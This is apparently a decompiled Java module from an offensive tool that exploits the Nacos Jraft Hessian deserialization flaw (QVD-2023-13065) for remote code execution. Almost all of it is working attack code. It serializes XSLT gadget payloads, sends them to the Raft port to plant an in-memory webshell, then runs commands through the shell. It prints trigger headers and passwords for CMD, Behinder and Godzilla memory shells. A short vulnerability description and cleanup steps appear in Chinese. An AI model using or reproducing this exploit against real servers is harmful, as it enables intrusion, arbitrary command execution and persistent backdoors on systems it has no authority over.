package com.alibaba.nacos.exploit;

import com.alibaba.nacos.consistency.entity.ConnectShell;
import com.alibaba.nacos.consistency.entity.HessianPayload;
import com.alibaba.nacos.consistency.entity.MetadataOperation;
import com.alibaba.nacos.consistency.entity.WriteRequest;
import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alipay.sofa.jraft.RouteTable;
import com.alipay.sofa.jraft.conf.Configuration;
import com.alipay.sofa.jraft.entity.PeerId;
import com.alipay.sofa.jraft.option.CliOptions;
import com.alipay.sofa.jraft.option.RpcOptions;
import com.alipay.sofa.jraft.rpc.impl.MarshallerHelper;
import com.alipay.sofa.jraft.rpc.impl.cli.CliClientServiceImpl;
import com.caucho.hessian.io.Hessian2Output;
import com.google.protobuf.ByteString;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.concurrent.ConcurrentHashMap;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_Jraft_Hessian_Deserialization.class */
public class Alibaba_Nacos_Jraft_Hessian_Deserialization implements Vulnerability {
    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n参考链接: %s\n\n", "Nacos Jraft Hessian反序列化漏洞(QVD-2023-13065)", "nacos默认的7848端口是用来处理集群模式下raft协议的通信，该端口的服务在处理部分jraft请求的时候使用hessian传输协议进行反序列化过滤不严，导致RCE", "1.4.0 <= Nacos < 1.4.6 和 2.0.0 <= Nacos < 2.2.3", "升级到最新版本, 清除内存马的方法: 只需要删除data/protocol/raft/xxx(如naming_service_metadata)/log目录下的文件并且重启nacos服务即可", "https://github.com/c0olw/NacosRce");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        return new ExecutionResult(false, "Nacos Jraft Hessian反序列化漏洞", null, "暂未实现poc检测,请使用内存马注入模块进行验证");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        URL url = new URL(str);
        String str2 = strArr[2] + ":" + strArr[3];
        String str3 = strArr[1];
        HessianPayload.os = strArr[4];
        ConnectShell connectShell = new ConnectShell(url);
        boolean isWebShell = connectShell.isWebShell();
        String str4 = strArr[0];
        boolean z = -1;
        switch (str4.hashCode()) {
            case -459086480:
                if (str4.equals("execute_cmd")) {
                    z = true;
                    break;
                }
                break;
            case 1110949945:
                if (str4.equals("check_shell")) {
                    z = false;
                    break;
                }
                break;
            case 1742271463:
                if (str4.equals("filter_shell_inject")) {
                    z = 2;
                    break;
                }
                break;
        }
        switch (z) {
            case false:
                return !isWebShell ? new ExecutionResult(true, "Nacos Jraft Hessian反序列化漏洞", "内存马不存活", null) : new ExecutionResult(true, "Nacos Jraft Hessian反序列化漏洞", "内存马依然存活", null);
            case true:
                return !isWebShell ? new ExecutionResult(true, "Nacos Jraft Hessian反序列化漏洞", "未检测到内存马，请执行内存马注入", null) : new ExecutionResult(true, "Nacos Jraft Hessian反序列化漏洞", connectShell.execCmd(str3), null);
            case true:
                if (isWebShell) {
                    return new ExecutionResult(true, "Nacos Jraft Hessian反序列化漏洞", "内存马依然存活,不执行注入操作\n\n清除内存马的方法: 只需要删除data/protocol/raft/xxx(如naming_service_metadata)/log目录下的文件并且重启nacos服务即可", null);
                }
                System.err.println("*****未检测到内存马，自动注入开始*****");
                Object genPayloadOfXslt = HessianPayload.genPayloadOfXslt("memshell");
                Object genPayloadOfXslt2 = HessianPayload.genPayloadOfXslt("run");
                MetadataOperation metadataOperation = new MetadataOperation();
                metadataOperation.obj0 = genPayloadOfXslt;
                metadataOperation.obj1 = genPayloadOfXslt2;
                try {
                    sendPayload(str2, getByteArrayOutputStream(metadataOperation).toByteArray());
                } catch (Exception e) {
                    e.printStackTrace();
                }
                return connectShell.isWebShell() ? new ExecutionResult(true, "Nacos Jraft Hessian反序列化漏洞", "内存马成功注入\n1、CMD内存马需要设置请求头x-client-data:cmd和Referer:https://www.google.com/和cmd:whoami\n2、冰蝎内存马需要设置请求头x-client-data:rebeyond和设置Referer:https://www.google.com/，连接路径随意，密码rebeyond\n3、哥斯拉内存马需要设置请求头x-client-data:godzilla和Referer:https://www.google.com/,连接路径随意,密码是pass 和 key\n\n清除内存马的方法: 只需要删除data/protocol/raft/xxx(如naming_service_metadata)/log目录下的文件并且重启nacos服务即可", null) : new ExecutionResult(true, "Nacos Jraft Hessian反序列化漏洞", "自动注入结束，注入失败", null);
            default:
                return new ExecutionResult(false, "Nacos Jraft Hessian反序列化漏洞", null, null);
        }
    }

    private static ByteArrayOutputStream getByteArrayOutputStream(Object obj) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);
        try {
            hessian2Output.getSerializerFactory().setAllowNonSerializable(true);
            hessian2Output.writeObject(obj);
            hessian2Output.flushBuffer();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return byteArrayOutputStream;
    }

    public static void sendPayload(String str, byte[] bArr) throws Exception {
        Configuration configuration = new Configuration();
        configuration.parse(str);
        RouteTable.getInstance().updateConfiguration("nacos", configuration);
        CliClientServiceImpl cliClientServiceImpl = new CliClientServiceImpl();
        cliClientServiceImpl.init((RpcOptions) new CliOptions());
        RouteTable.getInstance().refreshLeader(cliClientServiceImpl, "nacos", 1000).isOk();
        PeerId parsePeer = PeerId.parsePeer(str);
        Field declaredField = cliClientServiceImpl.getRpcClient().getClass().getDeclaredField("parserClasses");
        declaredField.setAccessible(true);
        ((ConcurrentHashMap) declaredField.get(cliClientServiceImpl.getRpcClient())).put("com.alibaba.nacos.consistency.entity.WriteRequest", WriteRequest.getDefaultInstance());
        MarshallerHelper.registerRespInstance(WriteRequest.class.getName(), WriteRequest.getDefaultInstance());
        cliClientServiceImpl.getRpcClient().invokeSync(parsePeer.getEndpoint(), WriteRequest.newBuilder().setGroup("naming_service_metadata").setData(ByteString.copyFrom(bArr)).build(), 5000L);
    }
}
